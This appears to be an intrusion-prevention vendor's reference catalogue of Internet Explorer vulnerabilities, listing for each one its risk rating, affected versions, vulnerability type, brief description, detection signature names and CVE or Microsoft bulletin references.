Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0113

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-741-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

A memory corruption vulnerability exists in Internet Explorer.

Situation:

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0113

References:

CVE-2016-0113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0113

MS16-023
http://technet.microsoft.com/security/bulletin/MS16-023

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0164

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-755-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Internet Explorer.

Situation:

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0164

References:

CVE-2016-0164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0164

MS16-037
http://technet.microsoft.com/security/bulletin/MS16-037

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0200

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-770-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Internet Explorer.

Situation:

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0200

References:

CVE-2016-0200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0200

MS16-063
http://technet.microsoft.com/security/bulletin/MS16-063

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3240

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-777-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

There exists a memory corruption vulnerability in Internet Explorer.

Situation:

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3240

References:

CVE-2016-3240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3240

MS16-084
http://technet.microsoft.com/security/bulletin/MS16-084

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3241

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-777-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

There exists a memory corruption vulnerability in Internet Explorer.

Situation:

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3241

References:

CVE-2016-3241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3241

MS16-084
http://technet.microsoft.com/security/bulletin/MS16-084

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3242

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-777-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

There exists a memory corruption vulnerability in Internet Explorer.

Situation:

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3242

References:

CVE-2016-3242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3242

MS16-084
http://technet.microsoft.com/security/bulletin/MS16-084

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3259

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-777-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

There exists a memory corruption vulnerability in Internet Explorer.

Situation:

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3259

References:

CVE-2016-3259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3259

MS16-084
http://technet.microsoft.com/security/bulletin/MS16-084

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2018-8460

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1108-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

There exists a use-after-free vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2018-8460

References:

CVE-2018-8460
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8460

ms18-oct
http://technet.microsoft.com/security/bulletin/ms18-oct

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2018-8491

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1108-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

There exists a use-after-free vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2018-8491

References:

CVE-2018-8491
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8491

ms18-oct
http://technet.microsoft.com/security/bulletin/ms18-oct

Internet-Explorer-MSHTML-CSS-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in CSS file handling in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-27-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0

Type:

Buffer Overflow

Description:

Microsoft Internet Explorer has a buffer overflow vulnerability in the handling of CSS files. A remote attacker can host a Web site that contains malformed CSS file. If user visits this site with a vulnerable browser, it is possible that the attacker gets unauthorized access to the user's computer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-MSHTML-CSS-Buffer-Overflow
File-Text_Internet-Explorer-MSHTML-CSS-Buffer-Overflow

References:

BID-12765
http://www.securityfocus.com/bid/12765

Internet-Explorer-MSHTML.DLL-Parsing-DoS

About this vulnerability:

Internet Explorer MSHTML.DLL Parsing DoS vulnerability.

Risk:

High

First detected in:

sgpkg-ips-671-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Browser

Description:

A vulnerability exists in Internet Explorer 6, in its inability to handle exceptional conditions, that allows remote attackers to trigger a denial of service condition by using malformatted HTML code.

Situation:

File-Text_Internet-Explorer-MSHTML.DLL-Parsing-DoS

References:

BID-16079
http://www.securityfocus.com/bid/16079

Internet-Explorer-OutlookExpress.AddressBook-DoS

About this vulnerability:

Internet Explorer OutlookExpress.AddressBook DoS vulnerability.

Risk:

High

First detected in:

sgpkg-ips-671-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Browser

Description:

A vulnerability exists in Internet Explorer 6 which allows remote attackers to cause a denial of service condition by creating a OutlookExpress.AddressBook COM object, which is invalid for Internet Explorer.

Situation:

File-Text_Internet-Explorer-OutlookExpress.AddressBook-DoS

References:

CVE-2005-4840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4840

OSVDB-26836
http://www.osvdb.org/26836

Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8594

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-944-5242

Last changed:

sgpkg-ips-1661-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Microsoft Internet Explorer. A successful exploitation could lead to remote code execution.

Situation:

File-Text_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8594
File-TextId_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8594

References:

CVE-2017-8594
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8594

ms17-jul
http://technet.microsoft.com/security/bulletin/ms17-jul

Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8618

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-944-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 10.0

Type:

Malfunction

Description:

There exists an out of bounds vulnerability in Microsoft Internet Explorer. A successful exploitation can allow a remote attacker to execute arbitrary code on the affected system.

Situation:

File-Text_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8618

References:

CVE-2017-8618
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8618

ms17-jul
http://technet.microsoft.com/security/bulletin/ms17-jul

Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2018-8619

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1119-5242

Last changed:

sgpkg-ips-1476-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a policy bypass vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-TextId_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2018-8619

References:

CVE-2018-8619
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8619

ms18-dec
http://technet.microsoft.com/security/bulletin/ms18-dec

Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2018-8653

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1122-5242

Last changed:

sgpkg-ips-1476-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2018-8653

References:

CVE-2018-8653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8653

ms18-dec
http://technet.microsoft.com/security/bulletin/ms18-dec

Internet-Explorer-Same-Origin-Policy-Bypass

About this vulnerability:

Cross-site scripting vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-156-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 5.0; Internet Explorer 5.5; Internet Explorer 6.0

Type:

Cross-site Scripting

Description:

There is a cross site scripting vulnerability in Internet Explorer. The vulnerability allows bypassing of the same origin policy enforced by the browser, leading to unauthorized access to sensitive information of another web site such as authentication cookies.

Situation:

HTTP_SS-Same-Origin-Policy-Bypass
File-Text_Same-Origin-Policy-Bypass

References:

CVE-2002-1186
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1186

BID-5610
http://www.securityfocus.com/bid/5610

OSVDB-7845
http://www.osvdb.org/7845

MS02-066
http://technet.microsoft.com/security/bulletin/MS02-066

Internet-Explorer-Scripting-Engine-Memory-Corruption-CVE-2020-17053

About this vulnerability:

A vulnerability in Internet Explorer Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1295-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Internet Explorer Scripting Engine. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Internet-Explorer-Scripting-Engine-Memory-Corruption-CVE-2020-17053

References:

CVE-2020-17053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17053

ms20-nov
http://technet.microsoft.com/security/bulletin/ms20-nov

Internet-Explorer-Scroll-Event-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-417-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Explorer

Situation:

HTTP_SS-Internet-Explorer-Scroll-Event-Remote-Code-Execution
File-Text_Internet-Explorer-Scroll-Event-Remote-Code-Execution

References:

CVE-2011-1993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1993

MS11-081
http://technet.microsoft.com/security/bulletin/MS11-081

Internet-Explorer-Security-Zone-Bypass-Url-Spoofing

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-420-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Input Validation

Description:

There is a vulnerability in the way Internet Explorer handles security restrictions within a web page. It allows a remote attacker to bypass the domain restriction and execute arbitrary code on the victim computer.

Situation:

File-Text_Internet-Explorer-Security-Zone-Bypass-Url-Spoofing

References:

BID-10597
http://www.securityfocus.com/bid/10597

Internet-Explorer-toStaticHTML-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-402-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A cross site scripting vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the toStaticHTML method failing to properly remove dynamic HTML elements from specially crafted HTML fragments.

Situation:

HTTP_SS-Internet-Explorer-toStaticHTML-Cross-Site-Scripting
File-Text_Internet-Explorer-toStaticHTML-Cross-Site-Scripting

References:

CVE-2011-1252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1252

OSVDB-72944
http://www.osvdb.org/72944

MS09-050
http://technet.microsoft.com/security/bulletin/MS09-050

Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2557

About this vulnerability:

A memory corruption vulnerability in Microsoft Internet Explorer

Risk:

Critical

First detected in:

sgpkg-ips-330-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer. By enticing a target user to visit a malicious web page, an attacker can execute arbitrary code with the privileges of the logged in user.

Situation:

HTTP_SS-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2557
File-Text_Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2557

References:

CVE-2010-2557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2557

MS10-053
http://technet.microsoft.com/security/bulletin/MS10-053

Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2559

About this vulnerability:

A memory corruption vulnerability in Microsoft Internet Explorer

Risk:

Critical

First detected in:

sgpkg-ips-330-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

Situation:

HTTP_SS-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2559
File-Text_Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2559

References:

CVE-2010-2559
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2559

BID-42290
http://www.securityfocus.com/bid/42290

MS10-053
http://technet.microsoft.com/security/bulletin/MS10-053

Internet-Explorer-Uninitialized-Parameter-DoS

About this vulnerability:	Internet Explorer Uninitialized Parameter DoS vulnerability.
Risk:	High
First detected in:	sgpkg-ips-670-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Internet Explorer
Type:	Browser
Description:	A vulnerability exists in Internet Explorer that allows remote attackers to trigger a denial of service by accessing a parameter of an unitialized HtmlDlgSafeHelper.HtmlDlgSafeHelper.BlockFormats or Internet.PopupMenu.RemoveItem ActiveX object.
Situation:	File-Text_Internet-Explorer-Uninitialized-Parameter-DoS

Internet-Explorer-Use-After-Free-CVE-2012-4787

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-497-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

An attempt to exploit vulnerability in Internet Explorer was detected

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2012-4787

References:

CVE-2012-4787
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4787

MS12-077
http://technet.microsoft.com/security/bulletin/MS12-077

Internet-Explorer-Use-After-Free-CVE-2012-4792

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-500-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

An attempt to exploit vulnerability in Internet Explorer was detected.

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2012-4792

References:

CVE-2012-4792
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792

OSVDB-88774
http://www.osvdb.org/88774

MS13-008
http://technet.microsoft.com/security/bulletin/MS13-008

Internet-Explorer-Use-After-Free-CVE-2013-0025

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-509-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0025-And-CVE-2013-1288

References:

CVE-2013-0025
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0025

BID-57830
http://www.securityfocus.com/bid/57830

OSVDB-90122
http://www.osvdb.org/90122

MS13-009
http://technet.microsoft.com/security/bulletin/MS13-009

Internet-Explorer-Use-After-Free-CVE-2013-0026

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-509-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0026

References:

CVE-2013-0026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0026

OSVDB-90123
http://www.osvdb.org/90123

MS13-009
http://technet.microsoft.com/security/bulletin/MS13-009

Internet-Explorer-Use-After-Free-CVE-2013-0029

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-509-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0029

References:

CVE-2013-0029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0029

MS13-009
http://technet.microsoft.com/security/bulletin/MS13-009

Internet-Explorer-Use-After-Free-CVE-2013-0087

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-515-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0087

References:

CVE-2013-0087
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0087

MS13-021
http://technet.microsoft.com/security/bulletin/MS13-021

Internet-Explorer-Use-After-Free-CVE-2013-0088

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-515-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0088

References:

CVE-2013-0088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0088

MS13-021
http://technet.microsoft.com/security/bulletin/MS13-021

Internet-Explorer-Use-After-Free-CVE-2013-0090

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-515-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0090

References:

CVE-2013-0090
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0090

MS13-021
http://technet.microsoft.com/security/bulletin/MS13-021

Internet-Explorer-Use-After-Free-CVE-2013-0091

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-527-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0091

References:

CVE-2013-0091
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0091

MS13-021
http://technet.microsoft.com/security/bulletin/MS13-021

Internet-Explorer-Use-After-Free-CVE-2013-0092

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-515-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0092

References:

CVE-2013-0092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0092

MS13-021
http://technet.microsoft.com/security/bulletin/MS13-021

Internet-Explorer-Use-After-Free-CVE-2013-0093

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-515-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0093

References:

CVE-2013-0093
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0093

MS13-021
http://technet.microsoft.com/security/bulletin/MS13-021

Internet-Explorer-Use-After-Free-CVE-2013-0094

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-515-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0094

References:

CVE-2013-0094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0094

MS13-021
http://technet.microsoft.com/security/bulletin/MS13-021

Internet-Explorer-Use-After-Free-CVE-2013-1288

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-515-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0

Type:

Malfunction

Description:

There is a use after free vulnerability in Internet Explorer 8.0.

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0025-And-CVE-2013-1288

References:

CVE-2013-1288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1288

MS13-021
http://technet.microsoft.com/security/bulletin/MS13-021

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-2551

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-523-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-2551

References:

CVE-2013-2551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2551

BID-58570
http://www.securityfocus.com/bid/58570

OSVDB-91197
http://www.osvdb.org/91197

MS13-037
http://technet.microsoft.com/security/bulletin/MS13-037

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3110

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-526-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3110

References:

CVE-2013-3110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3110

MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3111

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-526-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3111

References:

CVE-2013-3111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3111

BID-60381
http://www.securityfocus.com/bid/60381

OSVDB-94106
http://www.osvdb.org/94106

MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3112

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-526-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3112
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3112-2

References:

CVE-2013-3112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3112

MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3116

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-526-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3116

References:

CVE-2013-3116
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3116

MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3117

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-526-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3117

References:

CVE-2013-3117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3117

MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3118

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-526-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-TextId_Internet-Explorer-Use-After-Free-CVE-2013-3118

References:

CVE-2013-3118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3118

OSVDB-94112
http://www.osvdb.org/94112

MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3119

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-527-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3119

References:

CVE-2013-3119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3119

BID-60388
http://www.securityfocus.com/bid/60388

OSVDB-94113
http://www.osvdb.org/94113

MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3120

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-526-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3120

References:

CVE-2013-3120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3120

MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3121

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-526-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3121

References:

CVE-2013-3121
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3121

BID-60390
http://www.securityfocus.com/bid/60390

OSVDB-94115
http://www.osvdb.org/94115

MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3122

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-526-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3122

References:

CVE-2013-3122
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3122

MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047

